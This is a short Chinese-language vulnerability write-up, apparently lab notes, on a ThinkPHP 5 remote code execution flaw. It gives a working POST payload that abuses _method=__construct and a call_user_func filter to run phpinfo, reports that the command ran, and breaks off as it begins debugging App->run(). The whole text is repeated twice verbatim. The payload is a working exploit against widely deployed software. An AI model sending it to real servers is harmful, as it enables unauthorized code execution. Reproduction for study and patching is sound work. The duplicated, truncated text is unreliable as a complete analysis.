http://localhost/tp5.7/public/index?s=index
POST
_method=__construct&method=get&filter[0]=call_user_func&get[0]=phpinfo
1.漏洞复现。
成功执行命令。
2.开始进行RCE分析。
2.1 第一步造成变量覆盖。进入App-run()方法。如图开始断点调式。
http://localhost/tp5.7/public/index?s=index
POST
_method=__construct&method=get&filter[0]=call_user_func&get[0]=phpinfo
1.漏洞复现。
成功执行命令。
2.开始进行RCE分析。
2.1 第一步造成变量覆盖。进入App-run()方法。如图开始断点调式。